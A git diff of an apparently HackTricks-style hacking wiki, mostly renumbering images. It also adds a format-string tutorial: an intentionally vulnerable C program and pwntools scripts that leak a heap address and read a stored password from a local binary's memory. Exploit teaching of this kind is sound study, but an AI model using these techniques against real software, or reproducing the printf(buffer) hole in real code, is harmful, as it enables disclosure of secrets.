+<figure><img src=".gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
diff --git a/SUMMARY.md b/SUMMARY.md
index 989bcca15..9c3525572 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -790,6 +790,8 @@
   * [Radio](todo/hardware-hacking/radio.md)
   * [JTAG](todo/hardware-hacking/jtag.md)
   * [SPI](todo/hardware-hacking/spi.md)
+* [Industrial Control Systems Hacking](todo/industrial-control-systems-hacking/README.md)
+  * [Modbus Protocol](todo/industrial-control-systems-hacking/modbus.md)
 * [Radio Hacking](todo/radio-hacking/README.md)
   * [Pentesting RFID](todo/radio-hacking/pentesting-rfid.md)
   * [Infrared](todo/radio-hacking/infrared.md)
diff --git a/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md b/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md
index 71efc8cf3..0beb956c8 100644
--- a/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md
+++ b/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md
@@ -34,7 +34,7 @@ The **Procedure Linkage Table (PLT)** works closely with the GOT and serves as a
 
 Get the address to the GOT table with: **`objdump -s -j .got ./exec`**
 
-![](<../../.gitbook/assets/image (118).png>)
+![](<../../.gitbook/assets/image (121).png>)
 
 Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➤ x/20x 0xDIR_GOT`
 
@@ -42,7 +42,7 @@ Observe how after **loading** the **executable** in GEF you can **see** the **fu
 
 Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table:
 
-![](<../../.gitbook/assets/image (493).png>)
+![](<../../.gitbook/assets/image (496).png>)
 
 ### GOT2Exec
 
diff --git a/binary-exploitation/basic-binary-exploitation-methodology/tools/README.md b/binary-exploitation/basic-binary-exploitation-methodology/tools/README.md
index 94f370296..94960d06f 100644
--- a/binary-exploitation/basic-binary-exploitation-methodology/tools/README.md
+++ b/binary-exploitation/basic-binary-exploitation-methodology/tools/README.md
@@ -181,7 +181,7 @@ gef➤  bt
 For example, in the example below, a buffer flow in `local_bc` indicates that you need an offset of `0xbc`. Moreover, if `local_10` is a canary cookie it indicates that to overwrite it from `local_bc` there is an offset of `0xac`.\
 _Remember that the first 0x08 from where the RIP is saved belongs to the RBP._
 
-![](<../../../.gitbook/assets/image (1058).png>)
+![](<../../../.gitbook/assets/image (1061).png>)
 
 ## qtool
 
@@ -250,7 +250,7 @@ Inside the IDA folder you can find binaries that can be used to debug a binary i
 
 Then, configure the debugger: Debugger (linux remote) --> Proccess options...:
 
-![](<../../../.gitbook/assets/image (855).png>)
+![](<../../../.gitbook/assets/image (858).png>)
 
 <details>
 
diff --git a/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md b/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md
index 9a8995c78..c6a40bff6 100644
--- a/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md
+++ b/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md
@@ -170,7 +170,7 @@ while True:
         pass
 ```
 
-<figure><img src="../../../.gitbook/assets/image (1211).png" alt="" width="563"><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1214).png" alt="" width="563"><figcaption></figcaption></figure>
 
 ### Local Information (`/proc/[pid]/stat`)
 
diff --git a/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md b/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md
index 8e2fd1676..cab3e29cf 100644
--- a/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md
+++ b/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md
@@ -24,7 +24,7 @@ MTE operates by **dividing memory into small, fixed-size blocks, with each block
 
 When a pointer is created to point to that memory, it gets the same tag. This tag is stored in the **unused bits of a memory pointer**, effectively linking the pointer to its corresponding memory block.
 
-<figure><img src="../../.gitbook/assets/image (1199).png" alt=""><figcaption><p><a href="https://www.youtube.com/watch?v=UwMt0e_dC_Q">https://www.youtube.com/watch?v=UwMt0e_dC_Q</a></p></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1202).png" alt=""><figcaption><p><a href="https://www.youtube.com/watch?v=UwMt0e_dC_Q">https://www.youtube.com/watch?v=UwMt0e_dC_Q</a></p></figcaption></figure>
 
 When a program accesses memory through a pointer, the MTE hardware checks that the **pointer's tag matches the memory block's tag**. If the tags **do not match**, it indicates an **illegal memory access.**
 
@@ -32,7 +32,7 @@ When a program accesses memory through a pointer, the MTE hardware checks that t
 
 Tags inside a pointer are stored in 4 bits inside the top byte:
 
-<figure><img src="../../.gitbook/assets/image (1200).png" alt=""><figcaption><p><a href="https://www.youtube.com/watch?v=UwMt0e_dC_Q">https://www.youtube.com/watch?v=UwMt0e_dC_Q</a></p></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1203).png" alt=""><figcaption><p><a href="https://www.youtube.com/watch?v=UwMt0e_dC_Q">https://www.youtube.com/watch?v=UwMt0e_dC_Q</a></p></figcaption></figure>
 
 Therefore, this allows up to **16 different tag values**.
 
diff --git a/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md b/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md
index 6b6438c63..360778c3e 100644
--- a/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md
+++ b/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 
 **If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.**
 
-![](<../../../.gitbook/assets/image (862).png>)
+![](<../../../.gitbook/assets/image (865).png>)
 
 {% hint style="info" %}
 Note that **`checksec`** might not find that a binary is protected by a canary if this was statically compiled and it's not capable to identify the function.\
@@ -93,7 +93,7 @@ INI_SHELLCODE = RBP - 1152
 From the **RIP** you can calculate the **base address of the PIE binary** which is what you are going to need to create a **valid ROP chain**.\
 To calculate the base address just do `objdump -d vunbinary` and check the disassemble latest addresses:
 
-![](<../../../.gitbook/assets/image (476).png>)
+![](<../../../.gitbook/assets/image (479).png>)
 
 In that example you can see that only **1 Byte and a half is needed** to locate all the code, then, the base address in this situation will be the **leaked RIP but finishing on "000"**. For example if you leaked `0x562002970ecf`  the base address is `0x562002970000`
 
diff --git a/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md b/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md
index 9ec377e06..30e52b519 100644
--- a/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md
+++ b/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 
 **If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.**
 
-![](<../../../.gitbook/assets/image (862).png>)
+![](<../../../.gitbook/assets/image (865).png>)
 
 {% hint style="info" %}
 Note that **`checksec`** might not find that a binary is protected by a canary if this was statically compiled and it's not capable to identify the function.\
diff --git a/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md b/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md
index 68ef4728b..07f680df6 100644
--- a/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md
+++ b/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md
@@ -14,7 +14,51 @@ Other ways to support HackTricks:
 
 </details>
 
-## Code
+## Read Binary Start
+
+### Code
+
+```c
+#include <stdio.h>
+
+int main(void) {
+    char buffer[30];
+    
+    fgets(buffer, sizeof(buffer), stdin);
+
+    printf(buffer);
+    return 0;
+}
+```
+
+Compile it with:
+
+```python
+clang -o fs-read fs-read.c -Wno-format-security -no-pie
+```
+
+### Exploit
+
+```python
+from pwn import *
+
+p = process('./fs-read')
+
+payload = f"%11$s|||||".encode()
+payload += p64(0x00400000)
+
+p.sendline(payload)
+log.info(p.clean())
+```
+
+* The **offset is 11** because setting several As and **brute-forcing** with a loop offsets from 0 to 50 found that at offset 11 and with 5 extra chars (pipes `|` in our case), it's possible to control a full address.
+  * I used **`%11$p`** with padding until I so that the address was all 0x4141414141414141
+* The **format string payload is BEFORE the address** because the **printf stops reading at a null byte**, so if we send the address and then the format string, the printf will never reach the format string as a null byte will be found before
+* The address selected is 0x00400000 because it's where the binary starts (no PIE)
+
+<figure><img src="broken-reference" alt="" width="477"><figcaption></figcaption></figure>
+
+## Read passwords
 
 ```c
 #include <stdio.h>
@@ -72,25 +116,83 @@ for i in range(100):
 
 In the image it's possible to see that we can leak the password from the stack in the `10th` position:
 
-<figure><img src="../../.gitbook/assets/image (1231).png" alt=""><figcaption></figcaption></figure>
-
-<figure><img src="../../.gitbook/assets/image (1230).png" alt="" width="338"><figcaption></figcaption></figure>
-
-Running the same exploit but with `%p` instead of `%s` it's possible to leak a heap address from the stack at `%5$p`:
-
-<figure><img src="../../.gitbook/assets/image (1232).png" alt=""><figcaption></figcaption></figure>
-
-<figure><img src="../../.gitbook/assets/image (1233).png" alt=""><figcaption></figcaption></figure>
-
 <figure><img src="../../.gitbook/assets/image (1234).png" alt=""><figcaption></figcaption></figure>
 
-The difference between the leaked address and the address of the password is:
+<figure><img src="../../.gitbook/assets/image (1233).png" alt="" width="338"><figcaption></figcaption></figure>
 
+### Read data
+
+Running the same exploit but with `%p` instead of `%s` it's possible to leak a heap address from the stack at `%25$p`. Moreover, comparing the leaked address (`0xaaaab7030894`) with the position of the password in memory in that process we can obtain the addresses difference:
+
+<figure><img src="broken-reference" alt="" width="563"><figcaption></figcaption></figure>
+
+Now it's time to find how to control 1 address in the stack to access it from the second format string vulnerability:
+
+```python
+from pwn import *
+
+def leak_heap(p):
+    p.sendlineafter(b"first password:", b"%5$p")
+    p.recvline()
+    response = p.recvline().strip()[2:] #Remove new line and "0x" prefix
+    return int(response, 16)
+
+for i in range(30):
+    p = process("./fs-read")
+
+    heap_leak_addr = leak_heap(p)
+    print(f"Leaked heap: {hex(heap_leak_addr)}")
+
+    password_addr = heap_leak_addr - 0x126a
+
+    print(f"Try: {i}")
+    payload = f"%{i}$p|||".encode()
+    payload += b"AAAAAAAA"
+    
+    p.sendline(payload)
+    output = p.clean()
+    print(output.decode("utf-8"))
+    p.close()
 ```
-> print 0xaaaaaaac12b2 - 0xaaaaaaac0048
-$1 = 0x126a
+
+And it's possible to see that in the **try 14** with the used passing we can control an address:
+
+<figure><img src="broken-reference" alt="" width="563"><figcaption></figcaption></figure>
+
+### Exploit
+
+```python
+from pwn import *
+
+p = process("./fs-read")
+
+def leak_heap(p):
+    # At offset 25 there is a heap leak
+    p.sendlineafter(b"first password:", b"%25$p")
+    p.recvline()
+    response = p.recvline().strip()[2:] #Remove new line and "0x" prefix
+    return int(response, 16)
+
+heap_leak_addr = leak_heap(p)
+print(f"Leaked heap: {hex(heap_leak_addr)}")
+
+# Offset calculated from the leaked position to the possition of the pass in memory
+password_addr = heap_leak_addr + 0x1f7bc
+
+print(f"Calculated address is: {hex(password_addr)}")
+
+# At offset 14 we can control the addres, so use %s to read the string from that address
+payload = f"%14$s|||".encode()
+payload += p64(password_addr)
+
+p.sendline(payload)
+output = p.clean()
+print(output)
+p.close()
 ```
 
+<figure><img src="broken-reference" alt="" width="563"><figcaption></figcaption></figure>
+
 <details>
 
 <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
diff --git a/binary-exploitation/rop-return-oriented-programing/ret2csu.md b/binary-exploitation/rop-return-oriented-programing/ret2csu.md
index 77f46535a..a93a71e2f 100644
--- a/binary-exploitation/rop-return-oriented-programing/ret2csu.md
+++ b/binary-exploitation/rop-return-oriented-programing/ret2csu.md
@@ -87,7 +87,7 @@ gef➤  search-pattern 0x400560
 
 Another way to control **`rdi`** and **`rsi`** from the ret2csu gadget is by accessing it specific offsets:
 
-<figure><img src="../../.gitbook/assets/image (1) (1).png" alt="" width="283"><figcaption><p><a href="https://www.scs.stanford.edu/brop/bittau-brop.pdf">https://www.scs.stanford.edu/brop/bittau-brop.pdf</a></p></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (2).png" alt="" width="283"><figcaption><p><a href="https://www.scs.stanford.edu/brop/bittau-brop.pdf">https://www.scs.stanford.edu/brop/bittau-brop.pdf</a></p></figcaption></figure>
 
 Check this page for more info:
 
diff --git a/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md b/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md
index 4274fda41..1bf4d53bc 100644
--- a/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md
+++ b/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md
@@ -122,7 +122,7 @@ done
 
 The only ones I discovered would change the value of the registry where sp was copied before jumping to it (so it would become useless):
 
-<figure><img src="../../.gitbook/assets/image (1221).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
 
 ### Ret2reg
 
@@ -165,11 +165,11 @@ int main(int argc, char **argv) {
 
 Checking the disassembly of the function it's possible to see that the **address to the buffer** (vulnerable to bof and **controlled by the user**) is **stored in `x0`** before returning from the buffer overflow:
 
-<figure><img src="../../.gitbook/assets/image (1222).png" alt="" width="563"><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1225).png" alt="" width="563"><figcaption></figcaption></figure>
 
 It's also possible to find the gadget **`br x0`** in the **`do_stuff`** function:
 
-<figure><img src="../../.gitbook/assets/image (1223).png" alt="" width="563"><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1226).png" alt="" width="563"><figcaption></figcaption></figure>
 
 We will use that gadget to jump to it because the binary is compile **WITHOUT PIE.** Using a pattern it's possible to see that the **offset of the buffer overflow is 80**, so the exploit would be:
 
diff --git a/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md b/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md
index 7fdeed733..d10747bae 100644
--- a/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md
+++ b/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md
@@ -67,7 +67,7 @@ If the process is creating **children** every time you talk with it (network ser
 
 Here you can find **exactly where is the libc loaded** inside the process and **where is going to be loaded** for every children of the process.
 
-![](<../../../.gitbook/assets/image (850).png>)
+![](<../../../.gitbook/assets/image (853).png>)
 
 In this case it is loaded in **0xb75dc000** (This will be the base address of libc)
 
diff --git a/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md b/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md
index 617876660..c770eea31 100644
--- a/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md
+++ b/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md
@@ -19,7 +19,7 @@ Other ways to support HackTricks:
 [**One Gadget**](https://github.com/david942j/one\_gadget) allows to obtain a shell instead of using **system** and **"/bin/sh". One Gadget** will find inside the libc library some way to obtain a shell (`execve("/bin/sh")`) using just one **address**.\
 However, normally there are some constrains, the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP** you just have to send some more NULL values so the constrain is avoided.
 
-![](<../../../.gitbook/assets/image (751).png>)
+![](<../../../.gitbook/assets/image (754).png>)
 
 ```python
 ONE_GADGET = libc.address + 0x4526a
diff --git a/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md b/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md
index 18b356ba1..4cb189990 100644
--- a/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md
+++ b/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md
@@ -47,17 +47,17 @@ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
 
 Creating a pattern with **`pattern create 200`**, using it, and checking for the offset with **`pattern search $x30`** we can see that the offset is **`108`** (0x6c).
 
-<figure><img src="../../../.gitbook/assets/image (1215).png" alt="" width="563"><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1218).png" alt="" width="563"><figcaption></figcaption></figure>
 
 Taking a look to the dissembled main function we can see that we would like to **jump** to the instruction to jump to **`printf`** directly, whose offset from where the binary is loaded is **`0x860`**:
 
-<figure><img src="../../../.gitbook/assets/image (1216).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1219).png" alt=""><figcaption></figcaption></figure>
 
 ### Find system and `/bin/sh` string
 
 As the ASLR is disabled, the addresses are going to be always the same:
 
-<figure><img src="../../../.gitbook/assets/image (1219).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1222).png" alt=""><figcaption></figcaption></figure>
 
 ### Find Gadgets
 
@@ -150,11 +150,11 @@ clang -o rop rop.c -fno-stack-protector -Wno-format-security
 
 Setting a breakpoint before calling printf it's possible to see that there are addresses to return to the binary in the stack and also libc addresses:
 
-<figure><img src="../../../.gitbook/assets/image (1212).png" alt="" width="563"><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1215).png" alt="" width="563"><figcaption></figcaption></figure>
 
 Trying different offsets, the **`%21$p`** can leak a binary address (PIE bypass) and **`%25$p`** can leak a libc address:
 
-<figure><img src="../../../.gitbook/assets/image (1220).png" alt="" width="440"><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1223).png" alt="" width="440"><figcaption></figcaption></figure>
 
 Subtracting the libc leaked address with the base address of libc, it's possible to see that the **offset** of the **leaked address from the base is `0x49c40`.**
 
diff --git a/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md b/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md
index 62da79a7f..8e9877f65 100644
--- a/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md
+++ b/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md
@@ -80,7 +80,7 @@ from pwn import *
 cyclic_find(0x6161616b)
 ```
 
-![](<../../../../.gitbook/assets/image (1004).png>)
+![](<../../../../.gitbook/assets/image (1007).png>)
 
 After finding the offset (in this case 40) change the OFFSET variable inside the template using that value.\
 `OFFSET = "A" * 40`
@@ -154,7 +154,7 @@ Finally, **main function is called again** so we can exploit the overflow again.
 
 This way we have **tricked puts function** to **print** out the **address** in **memory** of the function **puts** (which is inside **libc** library). Now that we have that address we can **search which libc version is being used**.
 
-![](<../../../../.gitbook/assets/image (1046).png>)
+![](<../../../../.gitbook/assets/image (1049).png>)
 
 As we are **exploiting** some **local** binary it is **not needed** to figure out which version of **libc** is being used (just find the library in `/lib/x86_64-linux-gnu/libc.so.6`).\
 But, in a remote exploit case I will explain here how can you find it:
@@ -164,7 +164,7 @@ But, in a remote exploit case I will explain here how can you find it:
 You can search which library is being used in the web page: [https://libc.blukat.me/](https://libc.blukat.me)\
 It will also allow you to download the discovered version of **libc**
 
-![](<../../../../.gitbook/assets/image (218).png>)
+![](<../../../../.gitbook/assets/image (221).png>)
 
 ### 3.2- Searching for libc version (2)
 
@@ -260,14 +260,14 @@ Finally, the **address of exit function** is **called** so the process **exists
 
 **This way the exploit will execute a \_/bin/sh**\_\*\* shell.\*\*
 
-![](<../../../../.gitbook/assets/image (162).png>)
+![](<../../../../.gitbook/assets/image (165).png>)
 
 ## 4(2)- Using ONE\_GADGET
 
 You could also use [**ONE\_GADGET** ](https://github.com/david942j/one\_gadget)to obtain a shell instead of using **system** and **"/bin/sh". ONE\_GADGET** will find inside the libc library some way to obtain a shell using just one **ROP address**.\
 However, normally there are some constrains, the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP** you just have to send some more NULL values so the constrain is avoided.
 
-![](<../../../../.gitbook/assets/image (751).png>)
+![](<../../../../.gitbook/assets/image (754).png>)
 
 ```python
 ONE_GADGET = libc.address + 0x4526a
diff --git a/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md b/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
index f227ade10..97049b6fd 100644
--- a/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
+++ b/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -236,7 +236,7 @@ Try to **subtract 64 bytes to the address of "/bin/sh"**:
 BINSH = next(libc.search("/bin/sh")) - 64
 ```
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md b/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md
index a1c1b7538..b3f47008b 100644
--- a/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md
+++ b/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md
@@ -61,7 +61,7 @@ pattern create 200
 run
 ```
 
-<figure><img src="../../../.gitbook/assets/image (1202).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1205).png" alt=""><figcaption></figcaption></figure>
 
 arm64 will try to return to the address in the register x30 (which was compromised), we can use that to find the pattern offset:
 
@@ -69,7 +69,7 @@ arm64 will try to return to the address in the register x30 (which was compromis
 pattern search $x30
 ```
 
-<figure><img src="../../../.gitbook/assets/image (1203).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1206).png" alt=""><figcaption></figcaption></figure>
 
 **The offset is 72 (9x48).**
 
@@ -84,7 +84,7 @@ run
 info frame
 ```
 
-<figure><img src="../../../.gitbook/assets/image (1204).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1207).png" alt=""><figcaption></figcaption></figure>
 
 Now set a breakpoint after the `read()` and continue until the `read()` is executed and set a pattern such as 13371337:
 
@@ -93,15 +93,15 @@ b *vulnerable_function+28
 c
 ```
 
-<figure><img src="../../../.gitbook/assets/image (1205).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1208).png" alt=""><figcaption></figcaption></figure>
 
 Find where this pattern is stored in memory:
 
-<figure><img src="../../../.gitbook/assets/image (1206).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1209).png" alt=""><figcaption></figcaption></figure>
 
 Then: **`0xfffffffff148 - 0xfffffffff100 = 0x48 = 72`**
 
-<figure><img src="../../../.gitbook/assets/image (1207).png" alt="" width="339"><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1210).png" alt="" width="339"><figcaption></figcaption></figure>
 
 ## No PIE
 
@@ -137,7 +137,7 @@ print(p.recvline())
 p.close()
 ```
 
-<figure><img src="../../../.gitbook/assets/image (1208).png" alt="" width="375"><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1211).png" alt="" width="375"><figcaption></figcaption></figure>
 
 ### Off-by-1
 
@@ -163,7 +163,7 @@ print(p.recvline())
 p.close()
 ```
 
-<figure><img src="../../../.gitbook/assets/image (1209).png" alt="" width="375"><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1212).png" alt="" width="375"><figcaption></figcaption></figure>
 
 You can find another off-by-one example in ARM64 in [https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/), which is a real off-by-**one** in a fictitious vulnerability.
 
@@ -177,7 +177,7 @@ Compile the binary **without the `-no-pie` argument**
 
 Without a leak we don't know the exact address of the winning function but we can know the offset of the function from the binary and knowing that the return address we are overwriting is already pointing to a close address, it's possible to leak the offset to the win function (**0x7d4**) in this case and just use that offset:
 
-<figure><img src="../../../.gitbook/assets/image (1210).png" alt="" width="563"><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1213).png" alt="" width="563"><figcaption></figcaption></figure>
 
 ```python
 from pwn import *
diff --git a/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md b/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md
index f87b653b3..ade77e860 100644
--- a/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md
+++ b/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md
@@ -24,7 +24,7 @@ Every time you need to **restart the service SLMail** you can do it using the wi
 net start slmail
 ```
 
-![](<../.gitbook/assets/image (985).png>)
+![](<../.gitbook/assets/image (988).png>)
 
 ## Very basic python exploit template
 
@@ -58,13 +58,13 @@ Go to `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK`
 
 **File --> Attach**
 
-![](<../.gitbook/assets/image (866).png>)
+![](<../.gitbook/assets/image (869).png>)
 
 **And press START button**
 
 ## **Send the exploit and check if EIP is affected:**
 
-![](<../.gitbook/assets/image (903).png>)
+![](<../.gitbook/assets/image (906).png>)
 
 Every time you break the service you should restart it as is indicated in the beginnig of this page.
 
@@ -72,7 +72,7 @@ Every time you break the service you should restart it as is indicated in the be
 
 The pattern should be as big as the buffer you used to broke the service previously.
 
-![](<../.gitbook/assets/image (417).png>)
+![](<../.gitbook/assets/image (420).png>)
 
 ```
 /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
@@ -82,11 +82,11 @@ Change the buffer of the exploit and set the pattern and lauch the exploit.
 
 A new crash should appeard, but with a different EIP address:
 
-![](<../.gitbook/assets/image (633).png>)
+![](<../.gitbook/assets/image (636).png>)
 
 Check if the address was in your pattern:
 
-![](<../.gitbook/assets/image (415).png>)
+![](<../.gitbook/assets/image (418).png>)
 
 ```
 /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 39694438
@@ -102,9 +102,9 @@ buffer = 'A'*2606 + 'BBBB' + 'CCCC'
 
 With this buffer the EIP crashed should point to 42424242 ("BBBB")
 
-![](<../.gitbook/assets/image (871).png>)
+![](<../.gitbook/assets/image (874).png>)
 
-![](<../.gitbook/assets/image (89).png>)
+![](<../.gitbook/assets/image (92).png>)
 
 Looks like it is working.
 
@@ -120,9 +120,9 @@ buffer = 'A'*2606 + 'BBBB' + 'C'*600
 
 launch the new exploit and check the EBP and the length of the usefull shellcode
 
-![](<../.gitbook/assets/image (116).png>)
+![](<../.gitbook/assets/image (119).png>)
 
-![](<../.gitbook/assets/image (876).png>)
+![](<../.gitbook/assets/image (879).png>)
 
 You can see that when the vulnerability is reached, the EBP is pointing to the shellcode and that we have a lot of space to locate a shellcode here.
 
@@ -162,11 +162,11 @@ For example:
 
 In this case you can see that **you shouldn't use the char 0x0A** (nothing is saved in memory since the char 0x09).
 
-![](<../.gitbook/assets/image (108).png>)
+![](<../.gitbook/assets/image (111).png>)
 
 In this case you can see that **the char 0x0D is avoided**:
 
-![](<../.gitbook/assets/image (1095).png>)
+![](<../.gitbook/assets/image (1098).png>)
 
 ## Find a JMP ESP as a return address
 
@@ -184,7 +184,7 @@ You will **list the memory maps**. Search for some DLl that has:
 * **NXCompat: False**
 * **OS Dll: True**
 
-![](<../.gitbook/assets/image (552).png>)
+![](<../.gitbook/assets/image (555).png>)
 
 Now, inside this memory you should find some JMP ESP bytes, to do that execute:
 
@@ -195,7 +195,7 @@ Now, inside this memory you should find some JMP ESP bytes, to do that execute:
 
 **Then, if some address is found, choose one that don't contain any badchar:**
 
-![](<../.gitbook/assets/image (602).png>)
+![](<../.gitbook/assets/image (605).png>)
 
 **In this case, for example: \_0x5f4a358f**\_
 
diff --git a/c2/salseo.md b/c2/salseo.md
index 36ddabe7b..a532bb168 100644
--- a/c2/salseo.md
+++ b/c2/salseo.md
@@ -24,11 +24,11 @@ You can **select the architecture** inside Visual Studio in the **left "Build" T
 
 (\*\*If you can't find this options press in **"Project Tab"** and then in **"\<Project Name> Properties"**)
 
-![](<../.gitbook/assets/image (836).png>)
+![](<../.gitbook/assets/image (839).png>)
 
 Then, build both projects (Build -> Build Solution) (Inside the logs will appear the path of the executable):
 
-![](<../.gitbook/assets/image (378).png>)
+![](<../.gitbook/assets/image (381).png>)
 
 ## Prepare the Backdoor
 
@@ -101,17 +101,17 @@ Open the SalseoLoader project using Visual Studio.
 
 ### Add before the main function: \[DllExport]
 
-![](<../.gitbook/assets/image (405).png>)
+![](<../.gitbook/assets/image (409).png>)
 
 ### Install DllExport for this project
 
 #### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
 
-![](<../.gitbook/assets/image (878).png>)
+![](<../.gitbook/assets/image (881).png>)
 
